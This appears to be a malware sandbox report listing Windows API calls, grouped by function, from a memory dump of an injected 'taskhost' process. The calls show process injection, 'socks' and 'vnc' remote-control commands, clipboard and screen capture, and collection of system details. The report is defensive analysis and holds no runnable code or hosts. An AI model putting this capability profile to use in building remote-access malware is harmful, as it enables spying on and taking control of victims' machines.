Part of subcall function 0051C86B: WaitForSingleObject.KERNEL32(0000007C,000000FF), ref: 0051C884

Part of subcall function 0050BCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 0050BCEC
Part of subcall function 0050BCAF: Sleep.KERNEL32(000001F4), ref: 0050BCFB
Part of subcall function 0050BCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0050BD11

Part of subcall function 00518A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00518A5A
Part of subcall function 00518A29: FindNextFileW.KERNEL32(00000000,?), ref: 00518AB5
Part of subcall function 00518A29: FindClose.KERNEL32(00000000), ref: 00518AC0
Part of subcall function 00518A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00518ACC
Part of subcall function 00518A29: RemoveDirectoryW.KERNEL32(?), ref: 00518AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0051D39B
CharToOemW.USER32(?,?), ref: 0051D3B7
CharToOemW.USER32(?,?), ref: 0051D3C6

Part of subcall function 005140F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0051410D

ExitProcess.KERNEL32(00000000), ref: 0051D41C

Part of subcall function 00514E7B: CharToOemW.USER32(?,?), ref: 00514EAB
Part of subcall function 00514E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00514F2F

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00517AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 00517B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 00517B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 00517B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00517B72
GetWindowLongW.USER32(?,000000F0), ref: 00517B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00517B9D

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005185D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 005185F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00512D27,?,?,00000000), ref: 00518608
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00512D27,?,?,00000000), ref: 00518630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00518648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00512D27,?,?,00000000), ref: 00518662
CloseHandle.KERNEL32(?), ref: 0051866B

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00505A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 00505B1C

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

TlsGetValue.KERNEL32 ref: 00505AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 00505AD4
SaveDC.GDI32(?), ref: 00505AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 00505AF4
RestoreDC.GDI32(?,00000000), ref: 00505B06

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00514660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(00518C87,00000000,00000000,00000001,F0000040,?,00518C87,?,00000030,?,?,?,005191A0,00523EC0), ref: 00514679
CryptCreateHash.ADVAPI32(00518C87,00008003,00000000,00000000,00000030,?,00518C87,?,00000030,?,?,?,005191A0,00523EC0), ref: 00514691
CryptHashData.ADVAPI32(00000030,00000010,00518C87,00000000,?,00518C87), ref: 005146AD
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00518C87), ref: 005146C5
CryptDestroyHash.ADVAPI32(00000030,?,00518C87), ref: 005146DC
CryptReleaseContext.ADVAPI32(00518C87,00000000,?,00518C87,?,00000030,?,?,?,005191A0,00523EC0), ref: 005146E6

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00506010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,?,00002719,00020000,?,?,00000000,00000000), ref: 0050610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 005061E6

Part of subcall function 005070A6: GetVersionExW.KERNEL32(?,00000002,00000000,00000006), ref: 005070CA
Part of subcall function 005070A6: GetNativeSystemInfo.KERNEL32(?), ref: 005070D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,00000002,?,00000000,00000000), ref: 00506162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,00000000,00000000), ref: 005061A4

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 005134BD: GetSystemTime.KERNEL32(?,?,?,005060C8,?,00000000,00000000), ref: 005134C7
Part of subcall function 005134BD: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,005060C8,?,00000000,00000000), ref: 005134D5

Part of subcall function 005134E5: GetTimeZoneInformation.KERNEL32(?), ref: 005134F4

Strings

, xrefs: 00506218

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00507125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00507138

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 005071C0

Part of subcall function 005174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00507194,?,?,00000104,.exe,00000000), ref: 005174F4
Part of subcall function 005174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00507194,?,?,00000104), ref: 00517575

PathUnquoteSpacesW.SHLWAPI(?), ref: 005071A0
ExpandEnvironmentStringsW.KERNEL32(?,0051D23A,00000104), ref: 005071AD

Strings

.exe, xrefs: 00507147

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00514F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00514FA6
InternetSetOptionA.WININET(00000000,00000002,0052200C,00000004), ref: 00514FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00514FE2
InternetCloseHandle.WININET(00000000), ref: 00514FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00514F97, 00514FA5

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00515403, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 00515414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00515427
FreeLibrary.KERNEL32(?), ref: 00515479

Strings

urlmon.dll, xrefs: 0051540D
ObtainUserAgentString, xrefs: 00515421

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051A24F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(9), ref: 0051A265
SetEvent.KERNEL32(?), ref: 0051A286
LeaveCriticalSection.KERNEL32(9), ref: 0051A28D

Strings

3, xrefs: 0051A256
9, xrefs: 0051A25F, 0051A264, 0051A28C

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 005074BE
lstrcmpiA.KERNEL32(?,vnc), ref: 005074D1

Part of subcall function 00517425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00517444
Part of subcall function 00517425: CloseHandle.KERNEL32(?), ref: 00517450

Part of subcall function 00517477: SetLastError.KERNEL32(0000009B,00512AC8,00000000,0050BB5F,00000000,00522AF0,00000000,00000104,76C605D7,00000000), ref: 00517481
Part of subcall function 00517477: CreateThread.KERNEL32(00000000,00522AF0,00522AF0,00522AF0,00000000,00000000), ref: 005174A4

Part of subcall function 0051675E: shutdown.WS2_32(?,00000002), ref: 00516766
Part of subcall function 0051675E: #3.WS2_32(?,?,?,?), ref: 0051676D

Part of subcall function 005174BC: WaitForMultipleObjects.KERNEL32(?,00522AEC,00000001,000000FF), ref: 005174CE

CloseHandle.KERNEL32(?), ref: 005076EE

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 00516B8E: ReleaseMutex.KERNEL32(00000000,00513021,?,?,?), ref: 00516B92

Part of subcall function 00516444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00516463
Part of subcall function 00516444: freeaddrinfo.WS2_32(?,?,?,?,?,00507284,?), ref: 005164B0

Part of subcall function 005167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 005167CC

Part of subcall function 00516774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 005167A7

Part of subcall function 0051666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 005166EA
Part of subcall function 0051666B: WSASetLastError.WS2_32(0000274C), ref: 005166F9

Part of subcall function 0051636E: recv.WS2_32(?,?,00000001,00000000), ref: 00516392

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

Strings

socks, xrefs: 005074B7
vnc, xrefs: 005074CA

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00509D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00509E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00509E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 00509ED7

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Part of subcall function 00517607: RegQueryValueExW.KERNEL32(?,?,00000000,?,00519E26,?,?,?,005175CD,?,?,00000000,00000004,?), ref: 0051761F
Part of subcall function 00517607: RegCloseKey.KERNEL32(?,?,005175CD,?,?,00000000,00000004,?,?,?,?,00519E26,?,?), ref: 0051762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00509F7A
RegCloseKey.ADVAPI32(?), ref: 00509F8D

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 005174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00507194,?,?,00000104,.exe,00000000), ref: 005174F4
Part of subcall function 005174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00507194,?,?,00000104), ref: 00517575

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00508E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00508E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 00508F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 00508F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 00508F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 00508F7B

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00519224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 00519245

Part of subcall function 005186EF: GetFileSizeEx.KERNEL32(?,?,?,?,?,00506588,00000000), ref: 005186FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 00519286
CloseHandle.KERNEL32(?), ref: 00519292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 00519301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00519327

Part of subcall function 0051869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 005186B1

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00519959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

GetDIBits.GDI32(00000000,0050DE4B,00000000,00000001,00000000,00000000,00000000), ref: 00519991
GetDIBits.GDI32(00000000,0050DE4B,00000000,00000001,00000000,00000000,00000000), ref: 005199A7
DeleteObject.GDI32(0050DE4B), ref: 005199B4
CreateDIBSection.GDI32(00000000,00000000,00000000,00522888,?,?), ref: 00519A24

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

DeleteObject.GDI32(0050DE4B), ref: 00519A43

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051C49B, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

GetProcessId.KERNEL32(?), ref: 0051C509

Part of subcall function 0051245B: CreateMutexW.KERNEL32(00522C30,00000001,?,00522E70,76C605D7,?,00000002,?,76C605D7), ref: 005124A3
Part of subcall function 0051245B: GetLastError.KERNEL32 ref: 005124AF
Part of subcall function 0051245B: CloseHandle.KERNEL32(00000000), ref: 005124BD

Part of subcall function 00512542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00512574
Part of subcall function 00512542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0051316D,?,00000000,?,?,00000000), ref: 005125AB
Part of subcall function 00512542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0051316D,?,00000000,?,?,00000000), ref: 005125CB
Part of subcall function 00512542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0051316D,?,00000000), ref: 0051261A

GetThreadContext.KERNEL32 ref: 0051C557
SetThreadContext.KERNEL32(00000000,00000000), ref: 0051C596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 0051C5AD
CloseHandle.KERNEL32(?), ref: 0051C5B7

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051B3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0051B437
WriteFile.KERNEL32(0051B3D4,?,00000146,?,00000000), ref: 0051B475
WriteFile.KERNEL32(0051B3D4,?,00000000,?,00000000), ref: 0051B499
FlushFileBuffers.KERNEL32(0051B3D4), ref: 0051B4AD
CloseHandle.KERNEL32(0051B3D4), ref: 0051B4B6

Part of subcall function 00518716: SetFileAttributesW.KERNEL32(00000080,00000080,0051B4CD,?), ref: 0051871F
Part of subcall function 00518716: DeleteFileW.KERNEL32(?), ref: 00518729

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00505DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 00505E1A
IntersectRect.USER32(?,?), ref: 00505E58
IsRectEmpty.USER32(?), ref: 00505E6A
IntersectRect.USER32(?,?), ref: 00505E81

Part of subcall function 00505C8A: GetWindowThreadProcessId.USER32(?,?), ref: 00505CB4
Part of subcall function 00505C8A: ResetEvent.KERNEL32(00000010), ref: 00505D03
Part of subcall function 00505C8A: PostMessageW.USER32(?,?,?,00000010), ref: 00505D26
Part of subcall function 00505C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00505D35
Part of subcall function 00505C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 00505D60
Part of subcall function 00505C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 00505D70
Part of subcall function 00505C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00505D82
Part of subcall function 00505C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00505DA7
Part of subcall function 00505C8A: IntersectRect.USER32(?,?), ref: 00505DC7
Part of subcall function 00505C8A: FillRect.USER32(?,?,00000006), ref: 00505DD9
Part of subcall function 00505C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00505DED

GetTopWindow.USER32(?), ref: 00505EB1

Part of subcall function 00517AC1: GetWindow.USER32(?,00000001), ref: 00517AE3

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051B062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 0051B06B

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

GlobalLock.KERNEL32(00000000), ref: 0051B09F
EnterCriticalSection.KERNEL32(00523FB4,00000000,00000000), ref: 0051B0DF

Part of subcall function 0051AD5F: EnterCriticalSection.KERNEL32(00523FB4,?,?,?,0051B052,?), ref: 0051AD7C
Part of subcall function 0051AD5F: LeaveCriticalSection.KERNEL32(00523FB4,?,?,?,0051B052,?), ref: 0051AD9D
Part of subcall function 0051AD5F: EnterCriticalSection.KERNEL32(00523FB4,?,?,?,?,0051B052,?), ref: 0051ADAE
Part of subcall function 0051AD5F: LeaveCriticalSection.KERNEL32(00523FB4,?,?,?,0051B052,?), ref: 0051AE47

LeaveCriticalSection.KERNEL32(00523FB4,00000000,00504A68), ref: 0051B0F6

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

GlobalUnlock.KERNEL32(?), ref: 0051B109

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005168E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(00000000,00000002,00000000), ref: 005168F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0051691C
WSAGetLastError.WS2_32 ref: 00516923

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0051694F

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

#3.WS2_32(?), ref: 00516963

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00518A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 00518A5A

Part of subcall function 00518716: SetFileAttributesW.KERNEL32(00000080,00000080,0051B4CD,?), ref: 0051871F
Part of subcall function 00518716: DeleteFileW.KERNEL32(?), ref: 00518729

FindNextFileW.KERNEL32(00000000,?), ref: 00518AB5
FindClose.KERNEL32(00000000), ref: 00518AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00518ACC
RemoveDirectoryW.KERNEL32(?), ref: 00518AD3

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00505A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 00505A88

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

TlsGetValue.KERNEL32 ref: 00505A21
SaveDC.GDI32(?), ref: 00505A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 00505A61
RestoreDC.GDI32(?,00000000), ref: 00505A73

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00505BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,005130F6), ref: 00505C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,005130F6), ref: 00505C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,005130F6), ref: 00505C1C

Part of subcall function 005054A9: GetWindowInfo.USER32(?,?), ref: 00505515
Part of subcall function 005054A9: IntersectRect.USER32(?,?,-00000114), ref: 00505538
Part of subcall function 005054A9: IntersectRect.USER32(?,?,-00000114), ref: 0050558E
Part of subcall function 005054A9: GetDC.USER32(00000000), ref: 005055D2
Part of subcall function 005054A9: CreateCompatibleDC.GDI32(00000000), ref: 005055E3
Part of subcall function 005054A9: ReleaseDC.USER32(00000000,00000000), ref: 005055ED
Part of subcall function 005054A9: SelectObject.GDI32(00000000,?), ref: 00505602
Part of subcall function 005054A9: DeleteDC.GDI32(00000000), ref: 00505610
Part of subcall function 005054A9: TlsSetValue.KERNEL32(?), ref: 0050565B
Part of subcall function 005054A9: EqualRect.USER32(?,?), ref: 00505675
Part of subcall function 005054A9: SaveDC.GDI32(00000000), ref: 00505680
Part of subcall function 005054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0050569B
Part of subcall function 005054A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 005056BB
Part of subcall function 005054A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 005056CD
Part of subcall function 005054A9: RestoreDC.GDI32(00000000,?), ref: 005056E4
Part of subcall function 005054A9: SaveDC.GDI32(00000000), ref: 00505706
Part of subcall function 005054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0050571C
Part of subcall function 005054A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00505735
Part of subcall function 005054A9: RestoreDC.GDI32(00000000,?), ref: 00505743
Part of subcall function 005054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00505756
Part of subcall function 005054A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00505766
Part of subcall function 005054A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00505778
Part of subcall function 005054A9: TlsSetValue.KERNEL32(00000000), ref: 00505792
Part of subcall function 005054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 005057B2
Part of subcall function 005054A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 005057CE
Part of subcall function 005054A9: SelectObject.GDI32(00000000,?), ref: 005057E4
Part of subcall function 005054A9: DeleteDC.GDI32(00000000), ref: 005057EB
Part of subcall function 005054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00505813
Part of subcall function 005054A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 00505829

SetEvent.KERNEL32(00522868,?,00000001), ref: 00505C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00505C76

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050B0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0050B0B3
ReleaseMutex.KERNEL32(?), ref: 0050B0E7
IsWindow.USER32(?), ref: 0050B0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 0050B108
SendMessageW.USER32(?,00000215,00000000,?), ref: 0050B110

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051040D, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217

APIs

Part of subcall function 00516973: getsockname.WS2_32(?,?,?), ref: 00516991

Part of subcall function 0051636E: recv.WS2_32(?,?,00000001,00000000), ref: 00516392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 005104DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00510515

Part of subcall function 005164FD: socket.WS2_32(00000000,00000001,00000006), ref: 00516506
Part of subcall function 005164FD: bind.WS2_32(00000000,?,-0000001D), ref: 00516526
Part of subcall function 005164FD: listen.WS2_32(00000000,?), ref: 00516535
Part of subcall function 005164FD: #3.WS2_32(00000000,?,00504C21,7FFFFFFF,?,00000000,00000080,?,?,?), ref: 00516540

Part of subcall function 0051672E: accept.WS2_32(00000000,00000000,00000001), ref: 00516754

Part of subcall function 00516403: socket.WS2_32(?,00000001,00000006), ref: 0051640C
Part of subcall function 00516403: connect.WS2_32(00000000,?,-0000001D), ref: 0051642C
Part of subcall function 00516403: #3.WS2_32(00000000), ref: 00516437

Part of subcall function 005167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 005167CC

Part of subcall function 005165B7: recv.WS2_32(?,?,00000400,00000000), ref: 00516600
Part of subcall function 005165B7: #19.WS2_32(?,?,00000000,00000000), ref: 0051661A
Part of subcall function 005165B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00516657

Part of subcall function 0051675E: shutdown.WS2_32(?,00000002), ref: 00516766
Part of subcall function 0051675E: #3.WS2_32(?,?,?,?), ref: 0051676D

Part of subcall function 00510397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 005103BB
Part of subcall function 00510397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 005103CA

Strings

<MP, xrefs: 00510655, 0051061C, 0051056B
[, xrefs: 0051054E

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

